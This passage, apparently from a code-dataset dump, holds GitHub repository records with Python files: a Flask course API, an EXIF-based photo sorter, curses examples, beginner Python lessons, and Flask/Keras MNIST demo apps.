courses_query = courses_query.filter(Course.name.contains(q)) \n if date:\n courses_query = courses_query.filter(Course.starting_date <= date, Course.ending_date >= date)\n courses = courses_query.all()\n return CourseShema(many=True, only=['id', 'name']).dump(courses)\n\n @api.expect(course_fields)\n def post(self):\n course_data = CourseShema().load(\n request.get_json()\n )\n course = Course(**course_data)\n try:\n db.session.add(course)\n db.session.commit()\n except exc.IntegrityError as e:\n abort(400, description=f\"Course with name {course.name} already exist\")\n return CourseShema().dump(course)\n\n\[email protected]('/courses/<int:id>')\[email protected](params={'id': 'Course id'})\nclass CoursesDetailed(Resource):\n def _get_object(self, id: int) -> Course:\n return Course.query.get(id)\n\n def get(self, id: int):\n request\n course = self._get_object(id)\n return CourseShema().dump(course)\n \n @api.expect(course_fields)\n def put(self, id: int):\n course_data = CourseShema(partial=True).load(\n request.get_json()\n )\n course = self._get_object(id)\n for key, value in course_data.items():\n setattr(course, key, value)\n db.session.commit()\n return CourseShema().dump(course)\n \n def delete(self, id: int):\n if Course.query.filter_by(id=id).delete() == 0:\n abort(400, f'No course with id {id}')\n db.session.commit()" } ]
8
tuvokki/console
https://github.com/tuvokki/console
a223f1ae7a449ec190b00412323d023a1c3856f0
418efb7743348210e878d397ab56fec9557e8cfb
bf7f2f6f773077d93887649584e2c5050db199a5
refs/heads/master
2020-04-06T07:03:04.118468
2018-03-26T14:57:38
2018-03-26T14:57:38
61,790,685
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5020845532417297, "alphanum_fraction": 0.5038713812828064, "avg_line_length": 31.288461685180664, "blob_id": "ea36cfd8ddc81c98d40444414ce39d74305bfbf8", "content_id": "602ff5970914b45f8112f65f520753e83fee4564", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1679, "license_type": "permissive", "max_line_length": 99, "num_lines": 52, "path": "/photo_cleaner.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport os.path\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nfrom datetime import datetime\nfrom shutil import copyfile\n\ndef get_exif(fn):\n ret = {}\n try:\n i = Image.open(fn)\n info = i._getexif()\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n ret[decoded] = value\n except Exception, e:\n print(\"on {} no exif data is found.\", fn)\n return ret\n\ndisk = '/Volumes/Slim/disk2/'\n# disk = \"/Users/wouter/tmp/test/\"\nrecupdirs = next(os.walk(disk))[1]\n# outdir = \"/Users/wouter/tmp/out/\"\noutdir = '/Volumes/Slim/photos2/'\n\nif not os.path.exists(outdir + \"nodate/\"):\n os.makedirs(outdir + \"nodate/\")\n\nprint \"-----------------------------------------------------------------------\"\nfor recupdir in recupdirs:\n for file in os.listdir(disk + recupdir):\n if file.endswith(\".jpg\"):\n src = disk + recupdir + \"/\" + file\n print(\"Reading: \" + src)\n exif_data = get_exif(src)\n try:\n date_object = datetime.strptime(exif_data['DateTimeOriginal'], '%Y:%m:%d %H:%M:%S')\n directory = date_object.strftime(outdir + \"%Y/%m/%d/\")\n newfile = date_object.strftime(\"%H-%M-%S.jpg\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n dst = directory + newfile\n except Exception, e:\n dst = outdir + \"nodate/\" + file\n\n print(\"Copy to: \" + dst)\n if not os.path.isfile(dst):\n copyfile(src, dst)\n\nprint \"-----------------------------------------------------------------------\"\n" }, { "alpha_fraction": 0.6958333253860474, "alphanum_fraction": 0.7083333134651184, "avg_line_length": 23, "blob_id": "2e57dfb78df3dcb44b99cc99c022b6621b6d4f83", "content_id": "5e2996786d15b608c2aca60930a6b115e2d84d74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "permissive", "max_line_length": 56, "num_lines": 10, "path": "/tmp/walk.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport pprint\n\nrecupdirs = next(os.walk('/Volumes/Slim/disk/'))[1]\npp = pprint.PrettyPrinter(indent=4)\n# pp.pprint(recupdirs)\nfor recupdir in next(os.walk('/Volumes/Slim/disk/'))[1]:\n pp.pprint(recupdir)\n" }, { "alpha_fraction": 0.6544715166091919, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 21.363636016845703, "blob_id": "40d2cceb5733f74c7aca43736715693815015294", "content_id": "b7e1b893bf8aaeddf6fe06681d2daf65b34b6971", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "permissive", "max_line_length": 60, "num_lines": 11, "path": "/tmp/count.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\noutdir = '/Volumes/Slim/photos/'\noutdir2 = '/Volumes/Slim/photos2/'\n\ncpt = sum([len(files) for r, d, files in os.walk(outdir)])\ncpt2 = sum([len(files) for r, d, files in os.walk(outdir2)])\n\nprint(cpt)\nprint(cpt2)\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 16.600000381469727, "blob_id": "0e12c6cf637a17c645fbf48d25e9517fa06e0a3e", "content_id": "c1a9429999bf0dfe1f18293b369215b1231c04d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 264, "license_type": "permissive", "max_line_length": 70, "num_lines": 15, "path": "/Readme.md", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#Urwid tutorial and fun examples\n\n##Install\n\n`[sudo] apt-get install python-urwid`\n\nSee also https://github.com/urwid/urwid/wiki/Installation-instructions\n\n##run\n\n`python [tutorial].py`\n\n##More info\nhttp://urwid.org/tutorial/index.html\nhttp://urwid.org/index.html\n" }, { "alpha_fraction": 0.7137746214866638, "alphanum_fraction": 0.732856273651123, "avg_line_length": 38.02325439453125, "blob_id": "414d766101b602cd8c68e428e184307fa08cac5f", "content_id": "868379bce23dd55d48c838f5eb98d6c1a8573395", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1677, "license_type": "permissive", "max_line_length": 131, "num_lines": 43, "path": "/tmp/crstest.py", "repo_name": "tuvokki/console", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# crstest.py\nimport curses\n\nstdscr = curses.initscr()\n\n# Usually curses applications turn off automatic echoing of keys to the screen, in order to be able to read keys and only display\n# them under certain circumstances. This requires calling the noecho() function.\ncurses.noecho()\n\n# Applications will also commonly need to react to keys instantly, without requiring the Enter key to be pressed; this is called\n# cbreak mode, as opposed to the usual buffered input mode.\ncurses.cbreak()\n\n# Terminals usually return special keys, such as the cursor keys or navigation keys such as Page Up and Home, as a multibyte\n# escape sequence. While you could write your application to expect such sequences and process them accordingly, curses can\n# do it for you, returning a special value such as curses.KEY_LEFT. To get curses to do the job, you'll have to enable keypad mode.\nstdscr.keypad(1)\n\nbegin_x = 20; begin_y = 7\nheight = 5; width = 40\nwin = curses.newwin(height, width, begin_y, begin_x)\n\npad = curses.newpad(100, 100)\n# These loops fill the pad with letters; this is\n# explained in the next section\nfor y in range(0, 100):\n for x in range(0, 100):\n try:\n pad.addch(y,x, ord('a') + (x*x+y*y) % 26)\n except curses.error:\n pass\n\n# Displays a section of the pad in the middle of the screen\npad.refresh(0,0, 5,5, 20,75)\n\n# Terminating a curses application is much easier than starting one. You'll need to call\ncurses.nocbreak(); stdscr.keypad(0); curses.echo()\n\n# to reverse the curses-friendly terminal settings. Then call the endwin() function to restore the terminal to its original\n# operating mode.\ncurses.endwin()" } ]
5
samlee916/Python-For-Beginners
https://github.com/samlee916/Python-For-Beginners
ee38950002954300e447e52c130a283b4c20258a
f6072393cb15cffd59973a06936b5a3fc4dc59df
e612fd1aecd6219626491d7452bb471b4ee33b48
refs/heads/master
2020-04-12T20:39:02.479574
2018-12-21T17:49:14
2018-12-21T17:49:14
162,742,765
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7312661409378052, "alphanum_fraction": 0.7312661409378052, "avg_line_length": 37.79999923706055, "blob_id": "c9dade1d099e300da87b06dbe2027ad1501e4358", "content_id": "ec34999ec277e57901088ee62122a186d380fab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 387, "license_type": "no_license", "max_line_length": 78, "num_lines": 10, "path": "/LogicalOperators.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example using logical operators\n\nmy_name = \"Tom\"\n\nif my_name == \"Hello\": #if statement implementation\n print(\"Tom\")#prints Tom if it meets the conditions of the if statement\nelif my_name == \"Tom\": #if else implementation\n print(\"Tom\")#prints Tom if it meets the conditions of the if statement\nelse:\n print(\"Hello\")#prints Hello if it meets the conditions of the if statement" }, { "alpha_fraction": 0.6753246784210205, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 30, "blob_id": "9f1347b5d3f9530641d15ef86b783d7d51e38e03", "content_id": "1522597c7b95868fda77707bc7eebfa82d829cff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 77, "num_lines": 5, "path": "/Input.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example using input\n\nmy_name = input(\"What is your name?: \")#user input\n\nprint(\"Hi, my name is \" + my_name + \".\")#prints out the result with the input" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6214285492897034, "avg_line_length": 22.33333396911621, "blob_id": "31b00f8a79e0c07a11b9f71bc6940e431a3398cf", "content_id": "b9c45d477e51c3db3a29677047e785bd1609de7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 50, "num_lines": 6, "path": "/Range.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of using the ranger operator in Python\n\nmy_list = [1,2,3,4,5,6,7,8,9,10]\n\nfor x in range(1,5): #prints 1,2,3,4\n print(x)\n" }, { "alpha_fraction": 0.7019230723381042, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 20, "blob_id": "529c0a5b9c158f8cdf16ef0a5b6534f68e9352e6", "content_id": "a19c7ad65a58925589bfa3f885cc7ae785a6264b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/MultiLineStrings.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of using strings in multiple ways\n\nanimal = \"dog\"\n\nprint(\"A %s ran over the hill.\" % animal)" }, { "alpha_fraction": 0.5939849615097046, "alphanum_fraction": 0.5939849615097046, "avg_line_length": 24.285715103149414, "blob_id": "e65f573c8c408310d025fcf261b51ae888eaf446", "content_id": "6ba0f13fcf03d4e361fd04851ac83b56ed01fe66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 87, "num_lines": 21, "path": "/ForLoops.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of for loops\n\nmy_string = \"this is a string\"\n\nfor char in my_string: \n print(char) #prints each character\n\na_string = \"this is my string\"\n\nfor g in a_string:\n if g == \"g\": #if there a g in the variable a_string\n print(\"G\")\n\nmy_fruits = [\"banana\", \"apple\", \"pear\"]\n\nfor f in my_fruits:\n print(\"I like to eat \" + f + \".\")#prints out the sentence for each item on the list\n\nfor f in my_fruits:\n if f == \"banana\": #checks if banana is in the list\n print(\"I like bananas.\") \n" }, { "alpha_fraction": 0.6841659545898438, "alphanum_fraction": 0.7078746557235718, "avg_line_length": 24.148935317993164, "blob_id": "1742e6dbd35d72dac651733250d7d8da4e077aa2", "content_id": "97ebf373f847e0a63b23b50d1af66ea9a6093987", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 82, "num_lines": 47, "path": "/Lists.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example about lists\n\nanother_list = []\n\nmy_list = [\"apple\", \"pear\", \"orange\", 1, another_list]\n\nprint(len(my_list))#prints out 5 since there are five elements in the list my_list\n\nmy_list1 = [\"apple\", \"pear\", \"orange\"]\n\nmy_list1.append(\"banana\")#adds banana to my_list1\n\nprint(my_list1)#prints out my_list1\n\nmy_list1.pop()#pops out banana\n\nprint(my_list1)#prints only the three items originally listed\n\nmy_list1.pop(0)#pops out the first item in the list\n\nprint(my_list1)\n\nmy_list2 = [\"apple\", \"pear\", \"orange\"]\n\nmy_fruit = my_list2[1]#stores pear in the variable\n\nprint(my_fruit)#prints out pear \n\nmy_list2.insert(0, \"banana\")#adds banana to item 0\n\nprint(my_list2)#prints out a list of four items\n\nmy_list2.remove(\"banana\")#removes banana from the list\n\nprint(my_list2)#prints out three items: apple, pear, and orange\n\nmy_list3 = [\"apple\", \"pear\", \"orange\"]\n\nmy_list3.extend([\"strawberry\", \"kiwi\", \"peach\"])#adds multiple items in the list\n\nprint(my_list3)#prints out six items\n\nnew_list = [\"apple\", \"pear\", \"orange\", \"strawberry\", \"kiwi\", \"peach\"]\n\nnew_list1 = new_list[0:2]#shows only the first two items in the list\n\nprint(new_list1)#prints the first two items in the list" }, { "alpha_fraction": 0.6256410479545593, "alphanum_fraction": 0.7230769395828247, "avg_line_length": 16.727272033691406, "blob_id": "45e66f91cf087c748dcd4774b5aed081d945d4f6", "content_id": "8b6318e0d5e0ced309a91c757371e356303bfe42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 195, "license_type": "no_license", "max_line_length": 50, "num_lines": 11, "path": "/Numbers.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example of using numbers in Python\n\nprint(8*8)#prints out 64\n\nprint(8+8)#prints out 16\n\nprint(8/8)#prints out 1.0\n\nprint(8-8)#prints out 0\n\nprint(8%3)#prints out 2 because the remainder is 2\n" }, { "alpha_fraction": 0.7615384459495544, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 31.5, "blob_id": "984d93d5b558ee7901dd027ce67cfd11692b84ad", "content_id": "58ce7fa8246cfe676f246bd2393ab378c8a86b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 83, "num_lines": 8, "path": "/Functions.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example about using functions\n\ndef my_add_function(firstnumber, secondnumber):\n print(firstnumber + secondnumber)\n #a function that adds two numbers\n\nprint(\"Hello!\")\nmy_add_function(5,5)#calling the function and exceuting what is inside the function\n" }, { "alpha_fraction": 0.7450000047683716, "alphanum_fraction": 0.7450000047683716, "avg_line_length": 24.125, "blob_id": "ae621c775b1c6fb2176693372e49e5b13b2e99d1", "content_id": "666325e92b298dda9665149df54b617ad7c7d977", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/Strings.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example for strings\n\nfirst_variable = \"This is a first string. \"\nsecond_variable = \"This is the second string\"\n\ncombined_variable = first_variable + \" \" + second_variable\n\nprint(combined_variable)" }, { "alpha_fraction": 0.5688889026641846, "alphanum_fraction": 0.644444465637207, "avg_line_length": 23.77777862548828, "blob_id": "0eac655e98a5f3aaed6bb0aaacbce65bab308671", "content_id": "1fd6d4a59246b66540561bc32085d3148af22e39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 63, "num_lines": 9, "path": "/While.py", "repo_name": "samlee916/Python-For-Beginners", "src_encoding": "UTF-8", "text": "#An example using a while loop\n\nmy_list = [1,2,3,4,5,6,7,8,9,10]\n\nstart_number = 0\n\nwhile start_number < 5:\n print(my_list[start_number])#will print out numbers 1-5\n start_number += 1#adding 1 to start_number\n\n\n" } ]
10
Jeromeschmidt/DS-2.3-Data-Science-in-Production
https://github.com/Jeromeschmidt/DS-2.3-Data-Science-in-Production
b5bcd1b5eefbb0f178a528bed52d49a7c6b935d9
fbfba72bd6b66b545d60b348f9c0a814a4e92657
a32d0b505d24462f94516f589164a567af1acb3e
refs/heads/master
2022-12-15T13:15:22.105179
2020-10-26T23:10:28
2020-10-26T23:10:28
237,717,370
0
0
MIT
2020-02-02T04:20:06
2020-10-26T23:10:31
2022-12-08T05:25:57
Jupyter Notebook
[ { "alpha_fraction": 0.7185792326927185, "alphanum_fraction": 0.7308743000030518, "avg_line_length": 21.84375, "blob_id": "296ddc9ba85fd7a1d5fe6d2268e552a9edf87395", "content_id": "6059496b9fd2fb364918955a046f883521b54da0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 732, "license_type": "permissive", "max_line_length": 104, "num_lines": 32, "path": "/Lessons/Advance_Visualization/D3_Flask/nasdaq-viz-master/README.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# nasdaq-viz\n\n## Description\nThis project aims to visualize the top 100 companies on the nasdaq stock exchange within a bubble chart.\n\n## Goals and Visions\n1. Learn d3\n2. Handle loading the nasdaq data both per request and from a file\n3. Store dataframes as pickle files\n\n## How to run\nThe first thing that you need to do when running this project is run these commands:\n```bash\npip install -r requirements.txt\nbower install\n```\nThis will get you all the dependencies that you need.\n\nTo run the app, you do: `python app.py`.\n\n## How to use\nTo run in production mode: `python app.py`\n\nTo run in debug mode: `python app.py debug`\n\n\n## Resources\n[d3.js](https://d3js.org)\n\n[bower](https://bower.io/)\n\n[flask](http://flask.pocoo.org/)\n\n" }, { "alpha_fraction": 0.4680851101875305, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 14.666666984558105, "blob_id": "0d4f558f5b9d94351c20ab424fd88ebd66b05abf", "content_id": "cdb97323a3094129ea1f1e1fd8a4970c6c48afb7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 423, "license_type": "permissive", "max_line_length": 24, "num_lines": 27, "path": "/Lessons/Advance_Visualization/Chartist_Flask/visualizing-diet-master/requirements.txt", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "astroid==2.2.5\nautopep8==1.4.3\nClick==7.0\nentrypoints==0.3\nflake8==3.7.7\nFlask==1.0.2\nisort==4.3.17\nitsdangerous==1.1.0\nJinja2==2.10.1\nlazy-object-proxy==1.3.1\nMarkdown==3.1\nMarkupSafe==1.1.1\nmccabe==0.6.1\nmdv==1.7.4\nnumpy==1.16.2\npandas==0.24.2\npycodestyle==2.5.0\npyflakes==2.1.1\nPygments==2.3.1\npylint==2.3.1\npython-dateutil==2.8.0\npytz==2019.1\nsix==1.12.0\ntabulate==0.8.3\ntyped-ast==1.3.1\nWerkzeug==0.15.2\nwrapt==1.11.1\n" }, { "alpha_fraction": 0.7543352842330933, "alphanum_fraction": 0.7697495222091675, "avg_line_length": 29.47058868408203, "blob_id": "410c082c133d46028eeb42a5b78bccc84f61df75", "content_id": "234665693d36e356fd9ccf79d0fde1f97f90233e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1038, "license_type": "permissive", "max_line_length": 102, "num_lines": 34, "path": "/Lessons/Advance_Visualization/Chartist_Flask/visualizing-diet-master/README.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Visualizing with chartist\n\n## Description\nThis project is dedicated towards demonstrating the use of plotting data dynamically with chartist.js.\nAll data is provided by a backend consisting of two routes:\n\n1. Index route for fetching the index page\n2. time series route for fetching the appropriate time series data\n\nThe backend is built and powered by flask & pandas. (python 3.7.3)\n\n## Goals and Visions\n1. To demonstrate using chartist.js for plotting data dynamically via a web application\n2. Connect my data science, Frontend web, and Backend web skills together.\n\n## How to run\nTo get started, download this repository and install all the pip requirements utilizing:\n```bash\npip install -r requirements.txt\n```\n\n```bash\npython3 time_series_pandas_flask.py\n```\n\nto run the server which will allow you to access the application on port 5000 in debug mode\nand port 3000 in production mode.\n\n## Resources\n[Chartist.js](https://gionkunz.github.io/chartist-js/)\n\n[Pandas](https://pandas.pydata.org/)\n\n[Flask](http://flask.pocoo.org/) \n\n" }, { "alpha_fraction": 0.7868338823318481, "alphanum_fraction": 0.7993730306625366, "avg_line_length": 38.875, "blob_id": "7792acaf659d2ed2e76c8ece75cfdc54176194a2", "content_id": "02b885dbfecd876a9f06190dac037eeaeb85c7cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 319, "license_type": "permissive", "max_line_length": 113, "num_lines": 8, "path": "/Lessons/AdvancePython.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Advance Python for DS\n\nPlease open the following Jupyter Notebook:\n\nhttps://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/advance_python.ipynb\n\nMap, Reduce and Filter:\nhttps://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/map_reduce.ipynb\n" }, { "alpha_fraction": 0.7708489894866943, "alphanum_fraction": 0.7903831601142883, "avg_line_length": 54.45833206176758, "blob_id": "643ed65fe8df100c0c35f0ef9c571000fdee2db2", "content_id": "6dc1f8cccf7e83c85f3af834260368bd7bc60c9f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1331, "license_type": "permissive", "max_line_length": 148, "num_lines": 24, "path": "/Lessons/BigData.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Big Data with PySpark\n\nIn part 1, we learn how to configure spark installation on local machine and how to configure master and slave for real-world applications.\nFor part 1, please check:\n<br/>\n1- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_on_local_machine.ipynb\n\n\n\nIn part 2, we array manipulation and how to do array processing similar to what we usually do in Pandas and Numpy.\nFor part 2, please check:\n<br/>\n1- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_array_manipulation_1.ipynb\n<br/>\n2- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_array_manipulation_2.ipynb\n<br/>\n3- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_numpy.ipynb\n<br/>\n4- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Pyspark_pandas.ipynb\n\nIn part 3, we train a linear regression model in Pyspark on Advertising datasets.\nFor part 3, please check:\n<br/>\n1- https://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/Pyspark_Notebooks/Linear_Reg_Pyspark.ipynb\n" }, { "alpha_fraction": 0.6378685832023621, "alphanum_fraction": 0.6528711915016174, "avg_line_length": 31.21666717529297, "blob_id": "57d2e6126766134adffd0b142ac6f4a190c35ff4", "content_id": "664aaca30920a072b6af46e807c29884058c29ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1933, "license_type": "permissive", "max_line_length": 88, "num_lines": 60, "path": "/Docker_demo/DL_version/app.py", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Make a flask API for our DL Model\n\nimport tensorflow.keras as keras\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom flask_restplus import Api, Resource, fields\nfrom flask import Flask, request, jsonify\nimport numpy as np\nfrom werkzeug.datastructures import FileStorage\nfrom PIL import Image\nfrom keras.models import model_from_json\nimport tensorflow as tf\n\n\napp = Flask(__name__)\napi = Api(app, version='1.0', title='MNIST Classification', description='CNN for Mnist')\nns = api.namespace('Make_School', description='Methods')\n\nsingle_parser = api.parser()\nsingle_parser.add_argument('file', location='files',\n type=FileStorage, required=True)\n\nmodel = load_model('my_model.h5')\ngraph = tf.get_default_graph()\n\n# Model reconstruction from JSON file\n# with open('model_architecture.json', 'r') as f:\n# model = model_from_json(f.read())\n#\n# # Load weights into the new model\n# model.load_weights('model_weights.h5')\n\[email protected]('/prediction')\nclass CNNPrediction(Resource):\n \"\"\"Uploads your data to the CNN\"\"\"\n @api.doc(parser=single_parser, description='Upload an mnist image')\n def post(self):\n args = single_parser.parse_args()\n image_file = args.file\n image_file.save('milad.png')\n img = Image.open('milad.png')\n image_red = img.resize((28, 28))\n image = img_to_array(image_red)\n print(image.shape)\n x = image.reshape(1, 28, 28, 1)\n x = x/255\n # This is not good, because this code implies that the model will be\n # loaded each and every time a new request comes in.\n # model = load_model('my_model.h5')\n with graph.as_default():\n out = model.predict(x)\n print(out[0])\n print(np.argmax(out[0]))\n r = np.argmax(out[0])\n\n return {'prediction': str(r)}\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n" }, { "alpha_fraction": 0.6806167364120483, "alphanum_fraction": 0.6828193664550781, "avg_line_length": 31.428571701049805, "blob_id": "1ab10b0580aa74d7925c2e497edc6816016f61ea", "content_id": "c8a8f4ba0da4a1dcc2a3813ae9720ccecfb3cede", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "permissive", "max_line_length": 74, "num_lines": 14, "path": "/flask_demo/day1.py", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "import math\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Volume of a Cylinder\")\nparser.add_argument('-r', '--radius', type=int, help='Radius of Cylinder')\nparser.add_argument('-H', '--height', type=int, help='Height of Cylinder')\nargs = parser.parse_args()\n\ndef cylinder_volume(radius, height):\n vol = (math.pi) * (radius**2) * (height)\n return vol\n\nif __name__ == '__main__':\n print(cylinder_volume(args.radius, args.height))\n" }, { "alpha_fraction": 0.7790697813034058, "alphanum_fraction": 0.7965116500854492, "avg_line_length": 33.400001525878906, "blob_id": "ec29ff0f3ca5ac5470a19fdc34d27a7eb7208a7c", "content_id": "47953082ad215b48d7455407f88144f77d9d07da", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "permissive", "max_line_length": 106, "num_lines": 5, "path": "/Lessons/BigDataStorage.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Big Data Storage\n\nPlease open the following Jupyter Notebook:\n\nhttps://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/S3_Boto.ipynb\n" }, { "alpha_fraction": 0.6265060305595398, "alphanum_fraction": 0.759036123752594, "avg_line_length": 10.857142448425293, "blob_id": "0e8b871a34ffd84589dccc5a335efe839a511800", "content_id": "7a42d1e51ac114be4490200902422de0cd3d4da6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "permissive", "max_line_length": 18, "num_lines": 7, "path": "/Docker_demo/DL_version/requirements.txt", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "flask\nflask_restplus\ntensorflow==1.14.0\nkeras==2.2.4\nnumpy\nPillow\nWerkzeug==0.16.1\n" }, { "alpha_fraction": 0.5842068195343018, "alphanum_fraction": 0.5939902067184448, "avg_line_length": 25.0181827545166, "blob_id": "568cbf04decbbd9632435df04a3831a188c19198", "content_id": "374a43474ee5d193c84cc5a9f3b2fa4c24eea46c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2862, "license_type": "permissive", "max_line_length": 99, "num_lines": 110, "path": "/flask_demo/app.py", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# from flask import Flask, request, render_template\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def my_form():\n# return render_template('my-form.html')\n#\n# @app.route('/', methods=['POST'])\n# def my_form_post():\n# num = int(request.form['text'])\n# new_num = num+2\n# return new_num\n\n# from flask import Flask, request\n# from datetime import datetime\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def hello():\n# num = int(request.args['num']) + 2\n# return \"\"\"\n# <html><body>\n# <h1>{0}</h1>\n# </body></html>\n# \"\"\".format(\n# str(num))\n#\n# # Launch the FlaskPy dev server\n# app.run(host=\"localhost\", debug=True)\n\n# from flask import Flask, request, jsonify\n# app = Flask(__name__)\n#\n#\n# def summation(a, b):\n# return a + b\n#\n#\n# @app.route('/', methods=['GET'])\n# def my_route():\n# n = request.args.get('n', type=int)\n# m = request.args.get('m', type=int)\n# r = summation(n, m)\n# print(r)\n# return jsonify({'add': r})\n#\n#\n# if __name__ == \"__main__\":\n# app.run(host='0.0.0.0', port=5000)\n\n# from flask import Flask, render_template, request\n# from wtforms import Form, FloatField, validators\n# import math\n#\n# app = Flask(__name__)\n#\n# # Model\n# class InputForm(Form):\n# r = FloatField(validators=[validators.InputRequired()])\n#\n# def compute(r):\n# return math.sin(r)\n# # View\n# @app.route('/hw1', methods=['GET', 'POST'])\n# def index():\n# form = InputForm(request.form)\n# if request.method == 'POST' and form.validate():\n# r = form.r.data\n# s = compute(r)\n# return render_template(\"view_output.html\", 